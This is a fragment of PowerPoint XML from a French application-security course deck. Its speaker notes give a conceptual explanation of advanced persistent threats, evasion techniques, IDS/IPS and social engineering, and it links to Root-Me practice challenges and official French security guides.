              <a:t>Afin de sécuriser encore plus, une potentiel faille de l’intérieur, il est recommandé d’avoir un contrôle au niveau du matériel (serveur interne, pare-feu, switch …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">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8</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2588371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effectLst/>
              </a:rPr>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>AET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> sont en quelque sorte l'équivalent d'un passe-partout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>qui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> permet aux cybercriminels de pénétrer dans n'importe quel système vulnérable comme un « Enterprise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Planning » ou un « Customer Relationship Management ». Elles peuvent contourner les systèmes de sécurité réseau sans laisser de trace.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA45CBBD-9BDE-4015-9E8F-DE2763285296}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2026761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effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attaque dite “avancée” au sens où elle utilise tout un arsenal de techniques d’attaques et d’outils pour atteindre son objectif.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unitairement les composants d’une telle attaque ne sont pas forcément “évolués” techniquement (phishing, malware, XSS, etc.).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Des outils de génération de composants d’attaques existent (ex. Poison Ivy, etc.)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>zLa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> combinaison des méthodes et outils d’attaques en font une attaque avancée.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA45CBBD-9BDE-4015-9E8F-DE2763285296}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24933534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effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attaque basée sur une stratégie dont l’objectif est de rester le plus longtemps possible sans éveiller les soupçons (furtivité), par opposition une attaque “opportuniste”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L’attaque est scénarisé par les attaquants, et des objectifs précis sont établis pour compromettre toute une chaine de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>systèmes.Des</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> cibles de replis peuvent être définis. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L’objectif est de rester sous les “radars” (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and slow”)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA45CBBD-9BDE-4015-9E8F-DE2763285296}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26827004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effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C’est bien sûr une menace.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Elle implique une coordination de moyens techniques et humains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Elle est généralement peu automatisée (bien que les compromissions de systèmes puissent l’être).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les attaquants sont très motivés et dotés de compétences techniques et de moyens inhabituels</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA45CBBD-9BDE-4015-9E8F-DE2763285296}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10474314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effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les attaques APT utilisent les mêmes vecteurs d’attaques que les attaques traditionnelles pour compromettre leurs cibles, et ce malgré la présence de protections périmétriques (firewall, IDS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>systèmes de détection des intrusions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, IPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>systèmes de prévention des intrusions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="0" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> etc.).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> analysent le trafic réseau pour détecter des signatures correspondant à des cyberattaques connues</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>IPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> analysent également les paquets, mais ils peuvent aussi les bloquer en fonction du type d’attaques qu’ils détectent, ce qui contribue à stopper ces attaques.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Elles ne cherchent pas systématiquement à exploiter une vulnérabilité. Si l’attaquant peut passer par la porte, il l’utilisera (ex. vol de comptes d’accès VPN, identifiants, etc.). C’est le meilleur moyen de rester furtif (pas de blocage du système ou d’une application, pas de logs générés, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le facteur humain (social engineering, réseaux sociaux, forum, chat, etc.) est plus souvent utilisé dans les attaques APT que dans les attaques classiques. L’utilisateur a tendance à dire beaucoup de choses (trop) et ne pas mesurer les informations qu’il manipule.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>On notera que les attaques APT mettent rarement en œuvre des attaques de type « déni de service » ou des « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>defacements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA45CBBD-9BDE-4015-9E8F-DE2763285296}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7151503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A45CBBD-9BDE-4015-9E8F-DE2763285296}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28059914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93</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="875232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8B3120-E766-4D6A-8CD1-8FAF9E736F7D}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21778889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81C20EC-AAF6-4327-A786-DE39D7EEB8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9449" y="0"/>
            <a:ext cx="3822551" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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224248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3614191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4191812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2489940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2458437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B3F2E095-4F19-4E73-B86F-80D815FB320E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10919012" y="6356350"/>
            <a:ext cx="672354" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1100">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4144447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A8F80B6A-C86F-4497-9DA3-5BFACFEB9A92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10919012" y="6356350"/>
            <a:ext cx="672354" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1100">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1066252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48F995-FEA1-449B-A54C-B344303025B9}"/>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‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F91173F9-DD50-412D-BA4F-F380A9756674}"/>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303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1066252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4025118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2115564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3291703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2204299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414444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1067670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latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</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387697C8-BB50-4F4D-9088-3A1336513A7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369449" y="0"/>
            <a:ext cx="3822551" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219588024"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483727" r:id="rId1"/>
    <p:sldLayoutId id="2147483739" r:id="rId2"/>
    <p:sldLayoutId id="2147483728" r:id="rId3"/>
    <p:sldLayoutId id="2147483729" r:id="rId4"/>
    <p:sldLayoutId id="2147483738"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F00B1DB9-3447-40D6-A562-C6436C031185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10919012" y="6356350"/>
            <a:ext cx="672354" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1100">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219588024"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483742" r:id="rId1"/>
    <p:sldLayoutId id="2147483741" r:id="rId2"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3200" kern="1200" cap="all" spc="30" baseline="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hyperlink" Target="https://afcdp.net/la-loi-informatique-et-libertes/" TargetMode="Externa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hyperlink" Target="https://www.linkedin.com/posts/emmanuelmacron_les-etats-unis-ont-les-gafa-google-apple-activity-6742509736903614464-oc_A/" TargetMode="External"/><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29.sv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hyperlink" Target="https://blockproof.fr/blog/sanctions-rgpd-entreprises-pays" TargetMode="External"/><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hyperlink" Target="https://www.cnil.fr/fr/gerer-les-risques" TargetMode="External"/><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hyperlink" Target="https://www.root-me.org/en/Challenges/Web-Server/HTML" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide62.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.root-me.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hyperlink" Target="https://www.root-me.org/fr/Challenges/Web-Client/XSS-Stored-1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide71.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.root-me.org/en/Challenges/Web-Client/Javascript-Authentication" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.root-me.org/en/Challenges/Web-Client/Javascript-Source"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hyperlink" Target="https://www.root-me.org/fr/Challenges/Web-Client/CSRF-0-protection" TargetMode="External"/><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hyperlink" Target="https://www.root-me.org/fr/Challenges/Web-Serveur/Remote-File-Inclusion" TargetMode="External"/><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hyperlink" Target="https://www.ssi.gouv.fr/uploads/2017/01/guide_cpme_bonnes_pratiques.pdf" TargetMode="Externa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5B47D-8E1A-DED1-E7B3-90FBFD2EEFF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1A00765-545D-4DD2-D8E8-13DFE1481BD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="794657" y="5835629"/>
            <a:ext cx="9989574" cy="592956"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0"/>
              <a:t>SÉCURITÉ DES APPLICATIONS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6088BA4B-464B-7FFA-DCC7-DC19EB2A9A88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="6230360"/>
            <a:ext cx="6991776" cy="462540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
